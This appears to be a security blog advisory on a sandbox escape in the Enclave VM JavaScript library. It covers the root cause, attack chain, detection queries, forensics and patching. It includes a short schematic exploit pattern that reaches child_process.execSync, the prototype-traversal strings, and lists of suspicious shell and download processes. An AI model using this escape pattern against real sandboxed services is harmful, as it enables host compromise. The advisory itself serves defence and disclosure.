CVE-2026-27597: Critical Enclave VM Sandbox Escape Enables Full Remote Code Execution on Host Systems

Aegiron 10 mins0

CVE-2026-27597

CVE ID: CVE-2026-27597
Product: Enclave VM (@enclave-vm/core)
Vulnerability Type: JavaScript Sandbox Escape → Remote Code Execution (RCE)
Affected Versions: ≤ 2.10.1
Patched Version: 2.11.1
CVSS v3.1 Score: 10.0 (Critical)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Severity: Critical
Exploitability: Low complexity, no privileges required
Exploit Availability: Public Proof-of-Concept available

Overview

A critical sandbox escape vulnerability was identified in Enclave VM (@enclave-vm/core). The issue allows attacker-supplied JavaScript code to escape the intended isolation boundary and execute arbitrary commands on the underlying host system.

The vulnerability affects applications that execute untrusted JavaScript inside Enclave instances. If user-controlled code is passed into enclave.run() or equivalent execution methods, full system compromise may occur.

The issue results from improper isolation between sandboxed JavaScript objects and host-level objects. Certain prototype and constructor traversal paths were not fully restricted. This allowed access to internal host references, ultimately enabling execution of Node.js native functionality such as child_process.

This is a complete sandbox breakout leading to Remote Code Execution.

Technical Root Cause

The vulnerability stems from insufficient hardening of:

  • Prototype chain traversal
  • Constructor references
  • Host object exposure
  • Memory tracking internals
  • Node.js inspect hooks

Improper wrapping of native constructors allowed the sandbox to expose references to real host objects instead of fully isolated proxies.

Through prototype traversal patterns such as:

{}.__proto__.constructor

Access was gained to the native Object constructor rather than the restricted sandbox version.

Using:

Object.getOwnPropertyDescriptors(this)

Internal properties of the execution context were enumerated. In certain configurations, host references such as:

__host_memory_track__

or Node inspection symbols like:

Symbol.for('nodejs.util.inspect.custom')

could be leveraged to retrieve host-level objects.

Once a host reference was obtained, execution of:

process.mainModule.require('child_process').execSync(...)

or equivalent methods became possible.

This allowed direct OS command execution.

Attack Chain

  1. Untrusted JavaScript submitted to an application using Enclave.
  2. Prototype traversal performed to reach native constructors.
  3. Enumeration of hidden properties.
  4. Extraction of host-bound reference.
  5. Access to Node.js internals (process, child_process).
  6. Arbitrary command execution on host.
  7. Potential persistence or lateral movement.

No authentication, user interaction, or special permissions were required.

Impact

If exploited successfully:

  • Full remote code execution
  • Data exfiltration
  • Credential theft
  • Container or VM breakout (if insufficiently isolated)
  • Deployment of reverse shells
  • Installation of persistence mechanisms
  • Lateral movement within infrastructure

Any system running Enclave VM with untrusted input exposure must be considered at risk.

MITRE ATT&CK Mapping

  • T1611 – Escape to Host
  • T1059 – Command and Scripting Interpreter
  • T1106 – Native API
  • T1497 – Virtualization/Sandbox Evasion
  • T1027 – Obfuscated/Hidden Code (if payload is encoded)

Proof of Concept (Educational)

Public proof-of-concept examples demonstrate:

  • Constructor traversal
  • Descriptor enumeration
  • Host object extraction
  • Execution of id, whoami, or shell commands

A typical exploitation pattern involves:

const host = getHostReference();
const process = host.constructor("return process")();
process.mainModule.require("child_process").execSync("id");

This is provided strictly for defensive awareness and educational security research.

Exploitation Characteristics

Indicators During Exploitation

  • Use of __proto__
  • Use of .constructor
  • Calls to getOwnPropertyDescriptors
  • Access to __host_memory_track__
  • Invocation of Symbol.for('nodejs.util.inspect.custom')
  • Execution of child_process.execSync
  • Spawning of shell processes from Node runtime

Detection

Detection should focus on behavioral monitoring rather than static signatures.

1. Process Creation Monitoring

Linux Auditd Query

ausearch -k node_exec

Audit rule example:

-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/node -k node_exec

Look for:

  • /bin/sh
  • bash -c
  • id
  • whoami
  • curl
  • wget

Elastic KQL

process.parent.name: "node" AND 
process.name: ("sh" OR "bash" OR "curl" OR "wget")

Splunk Query

index=process_logs parent_process=node 
| search process_name IN ("sh","bash","curl","wget")
| table _time host user parent_process process_name command_line

Microsoft Defender Advanced Hunting (KQL)

DeviceProcessEvents
| where InitiatingProcessFileName == "node.exe"
| where FileName in~ ("cmd.exe","powershell.exe","bash.exe")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine

2. Application Log Monitoring

Search for suspicious payload patterns:

Splunk

index=app_logs "enclave.run"
| search "__proto__" OR "constructor" OR "__host_memory_track__"

Elastic KQL

message: ("__proto__" OR "__host_memory_track__" OR "getOwnPropertyDescriptors")

3. Network Monitoring

Outbound connections from a Node service immediately after code execution:

process.name: "node" AND network.direction: "outgoing"

Look for:

  • Unknown IP addresses
  • DNS anomalies
  • Reverse shell patterns

Log Sources Required

  • Process creation logs (Sysmon / Auditd / EDR)
  • Application runtime logs
  • Container runtime logs (if applicable)
  • Network flow logs
  • Node.js debug logs (if enabled)
  • Cloud workload protection logs (for containerized deployments)

Forensic Investigation Guidance

If exploitation is suspected:

  1. Isolate affected host.
  2. Collect process creation logs.
  3. Dump Node process memory if possible.
  4. Review shell history of service account.
  5. Inspect /tmp, /var/tmp, application directories.
  6. Review cron jobs and systemd services.
  7. Rotate all credentials accessible by the host.
  8. Rebuild system if compromise is confirmed.

Mitigation

Immediate Actions

  • Upgrade to version 2.11.1 or later.
  • Disable execution of untrusted JavaScript until patching is completed.
  • Restrict network access to Enclave services.
  • Run Enclave inside a hardened container or dedicated VM.
  • Remove unnecessary system privileges.

Defense-in-Depth

  • Apply seccomp profiles for containers.
  • Disable outbound internet access if not required.
  • Enforce strict RBAC.
  • Monitor child process creation from Node.

Risk Assessment

Any exposed Enclave instance executing user-controlled JavaScript should be considered highly vulnerable.

Given the availability of public PoC and low complexity exploitation path, risk of active exploitation is high.

Systems used for:

  • AI agent execution
  • SaaS code runners
  • Server-side plugin engines
  • Multi-tenant JS execution platforms

are particularly exposed.

Remediation

Upgrade to:

@enclave-vm/core version 2.11.1 or later

Official patch information:
https://github.com/advisories/GHSA-f229-3862-4942

No reliable workaround exists other than upgrading.

Conclusion

CVE-2026-27597 represents a complete breakdown of sandbox isolation within Enclave VM. The vulnerability allows untrusted JavaScript to cross isolation boundaries and execute arbitrary operating system commands.

Given the severity, public exploit availability, and low attack complexity, immediate patching and monitoring are strongly advised.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.